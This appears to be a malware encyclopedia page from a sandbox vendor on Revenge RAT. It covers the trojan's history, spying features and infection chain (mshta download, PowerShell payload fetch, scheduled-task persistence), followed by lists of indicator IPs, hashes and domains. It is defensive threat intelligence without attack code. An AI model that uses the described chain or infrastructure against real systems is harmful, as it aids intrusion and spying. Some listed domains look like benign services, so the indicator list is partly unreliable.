Revenge

Revenge was one of the most popular remote access trojans to be used in 2019 when it was featured in a huge malicious campaign named “Aggah”. This malware can take remote control of infected machines and spy after the victims.

Type
Trojan
Origin
Unknown
First seen
1 January, 2016
Last seen
25 January, 2023
Global rank
35
Week rank
27
Month rank
30
IOCs
5429

What is Revenge Malware?

Revenge belongs to the class of Remote Access Trojans which means that it is usually used by the attackers to control infected PCs remotely or spy on the users by monitoring keystrokes and even computer surroundings through the remote webcam and microphone access.

Discovered for the first time in 2016, Revenge RAT continues to be a threat at the present day with a big spike in popularity monitored in 2019, when the malware was observed targeting corporations and government structures all around the world in a massive malicious campaign codenamed “Aggah”. Thanks to a large variety of distribution methods similar to ransomware, robust core feature-set, and solid persistence mechanisms, Revenge has become a popular choice for cybercriminals. The popularity of this RAT was further aided by its open-source nature – anybody can freely download Revenge on underground hacking forums and employ it in their own campaigns.

General description of Revenge

The Revenge RAT was first observed in the wild in June 2016, when it was released by a user with a nick Napoleon – an Arabic-speaking member of the underground hacking community.

The initial version of this malware was a simple malicious program that didn’t offer much, if any, code obfuscation and was mainly used by other Arabic-speaking cybercriminals. Despite the simplicity of the malware, at the time, only one out of 54 of VirusTotal scanners could pick up the malicious nature of the Revenge code, which confused the researchers bearing in mind the lack of anti-analysis techniques.

The creator used Visual Basic to develop this RAT and personally admitted that the malware was very bare-bones at the time of its initial release– providing only the most basic functions and definitely losing to competitors in terms of core feature-set. According to Napoleon, this explained why Revenge was available free of charge.

After two months since the initial release, a new version v0.2 was issued by the author, on a more popular hacking forum, this time with more features, but still offered completely free of charge. Since then Revenge has evolved even further and today, it offers cybercriminals a wide range of capabilities including remote files and registry alterations on an infected machine, access to memory, processes, and services as well as access to connected devices such as keyboards, webcams, and mice, allowing this malware to record the actions of its victims and collect information like banking credentials and social account data.

Core malicious feature-set was not the only thing that evolved over the course of the Revenge lifetime. Improvements in distribution and persistence made this threat truly a force to be reckoned with. In some campaigns, scripts were executed in the HTML of a custom Blogspot [com] page.

Revenge malware analysis

A video recorded in the ANY.RUN malware hunting service allows us to take a look at the execution of this malware as it unfolds and also other malicious programs like ransomware.

process graph of the revenge trojan execution Figure 1: Displays the lifecycle of Revenge in a visual form. A graph generated by ANY.RUN

text report of the revenge analysis Figure 2: Shows a customizable text report generated by the ANY.RUN malware analysis service which allows diving deeper into the details of the Revenge execution process.

Revenge execution process

Sometimes the first steps of Revenge trojan execution may vary depending on how it made its way into a victim's computer. The most common form of initial infiltration vector is by the use of Mshta.exe for downloading the payload or for direct execution from a URL. After the payload is delivered to the infected machine, Mshta.exe changes the autorun value in the registry and starts three processes - cmd.exe, powershell.exe and schtasks.exe. It starts cmd.exe to kill processes from a list, in the given example processes from the Microsoft Office packet were targeted. Powershell.exe is being launched to download the main payload. In turn, schtasks.exe is launched in a way to generate a scheduled task that provides Revenge persistence in the infected system. After all these steps, the malware is ready to complete commands from C2 servers.

How to avoid infection by Revenge?

The best line of defense against threats like Revenge RAT is to keep a security product installed and updated with the latest firmware. One should not disable native Windows security features, regularly update the OS and adhere to the best security practices of staying safe online.

As such, it is advised to stay clear of downloading email attachments from unknown senders and never enabling macros in Microsoft Office if prompted to do so by a file downloaded from a suspicious email. The same advice comes for other threats like Glupteba and Smoke Loader.

Distribution of Revenge

Revenge has been seen being distributed in a variety of ways the same as ransomware, some of which are potentially more effective than others. For example, Revenge is known to infect PCs from malicious email attachments and corrupted ads on compromised websites.

Most commonly, once delivered in the Microsoft Office file that was downloaded and launched by the potential victim, Revenge will use macros to connect to an outside domain, sometimes hidden on a web page, from which additional scripts and content are downloaded until the actual malware is installed on the PC.

How to detect Revenge RAT using ANY.RUN?

Analysts can get information about which MITRE ATT&CK™ MATRIX techniques were applied by malware. Just click on the "ATT&CK™ MATRIX " button.

Revenge MITRE ATT&CK MATRIX techniques Figure 3: Revenge MITRE ATT&CK MATRIX techniques

Conclusion

Revenge is no slouch when it comes to Remote Banking Trojans. It has begun its lifespan as a simplistic malware such as ransomware and without anti-analysis features but has evolved to become a capable and persistent trojan used in massive attacks in Europe, North America, Asia, and the Middle East.

The popularity of this malware is not only due to its robust feature-set, but also ready availability since Revenge can be downloaded for free from a number of underground communities.

Professionals can establish a secure cyber defense against Revenge and similar RATs and secure their corporate or government networks by reverse engineering and studying a threat using malware hunting services like to ANY.RUN.

IOCs

IP addresses
79.134.225.46
87.66.106.20
38.132.101.45
91.109.188.2
79.134.225.53
79.134.225.72
91.109.180.5
91.109.176.3
139.180.171.110
75.127.1.230
185.140.53.71
89.46.100.217
154.183.166.54
45.133.1.154
3.130.209.29
79.134.225.43
91.109.188.13
3.14.182.203
3.13.191.225
185.204.1.236
Hashes
4dd82c8cfe6e1bd52dc523ba8bb6bb1891f95fcc7187e4f4817400eb3547cda9
e79cebc3c15fcf2ea8f06306a9332d3536085993f0fdd860f7befe15fc2d0128
94863360f8c1537e3c1db91e6c3937f56a189e81a9ab2adc101b7e1d40dbfcde
e54384fe872d30bf574d7b80311ce1c6d9f86a8db7b6e47cbd03069eea1bdd61
7e2acba743a3ae13a8c65676797ac2324efad89a23834b54aa4b0cdaaa02e681
168a439da3430f8ef5a8711d3b12ca3328b746d6259b2efaf5ce5a8b9d2925d3
b498478906628fecb57ccd1d01ac7f85d21e6335b63b81d4f3e5ec7666bbe211
724068f536a07f3a2a0e53567cac6fb83656922c6434e56744f584f72502d196
82cb319995f2bfdf1b209b82fa7b7e52609afa6001d30eaf5727f8602da1435e
00a801875ee1493891f3ae991afc3ae228080f23256f84264da51d7bddc89ed4
0f47c14fe2cbc5ee7d6dd978478484325b9280270ada700590267b7ba5ff47f6
c039a50c98e813d2b37d42bc778079c0862a52681e2455bc54d7cec7c44c3be9
9f9c75a4c6fc8e3bfc0ee95d1ea4ccf6786d31758f16c8328e9443ec0dd31e1b
a4f96d52c5075341a5759cc604a612eafce297821d87cc51b8402ac5aa9b4c34
3338c10e11585a54ef37e266497462018cbbc57a4a9edd528f30e33fed95e52c
94b857c59c37f7701e2375200f4323af806a98a2651d8ed6b83d8aa974a8e129
5b7e711b51aef8165d2ffdc83c0d424b392c5a92146e1ee4aa6dfe2a372a1bbd
4f86c1694490e326bf67b119cc7864b34245190b3cf136c63c000189ecd004a0
0768d53265d1d6719b426b62286de4afa945a6c8c0cb13b91a83a3e8c7d20d21
532cc4d5a60ea4981f059dcde2881e8130ee1b484d3e066e51ea72a80f5ee6c6
Domains
vcctggqm3t.dattolocal.net
booking.msg.bluhotels.com
booking.msg.bluhotels.com
mkt.denodo.com
c16d-35-240-187-111.ngrok.io
isns.net
cdn.wisepops.com
todspm3.duckdns.org
microsoftoutlook.duckdns.org
majul.com
WindowsAuthentication324-49629.portmap.host
thuocnam.tk
krupskaya.com
m-onetrading-jp.com
ticket.ipv10.eu
3jkpvk2m8y.dattolocal.net
elx01.knas.systems
homodwanouli.publicvm.com
chommyflozy.duckdns.org
behco.duckdns.org

HAVE A LOOK AT

Adwind screenshot
Adwind
adwind trojan
Adwind RAT, sometimes also called Unrecom, Sockrat, Frutas, jRat, and JSocket, is a Malware As A Service Remote Access Trojan that attackers can use to collect information from infected machines. It was one of the most popular RATs in the market in 2015.
Read More
Agent Tesla screenshot
Agent Tesla
agenttesla trojan rat stealer
Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.
Read More
AsyncRAT screenshot
AsyncRAT
asyncrat
AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.
Read More
Ave Maria screenshot
Ave Maria
avemaria stealer trojan rat
Ave Maria malware is a Remote Access Trojan that is also called WARZONE RAT. Hackers use it to control the PCs of their victims remotely and steal information from infected PCs. For example, they can remotely activate the camera to take pictures of a victim and send them to a control server.
Read More
Azorult screenshot
Azorult
azorult trojan rat
AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.
Read More
Cobalt Strike screenshot
Cobalt Strike
cobaltstrike
Cobalt Strike is a legitimate penetration software toolkit developed by Forta. But its cracked versions are widely adopted by bad actors, who use it as a C2 system of choice for targeted attacks.
Read More

Our website uses cookies. By visiting the pages of the site, you agree to our Privacy Policy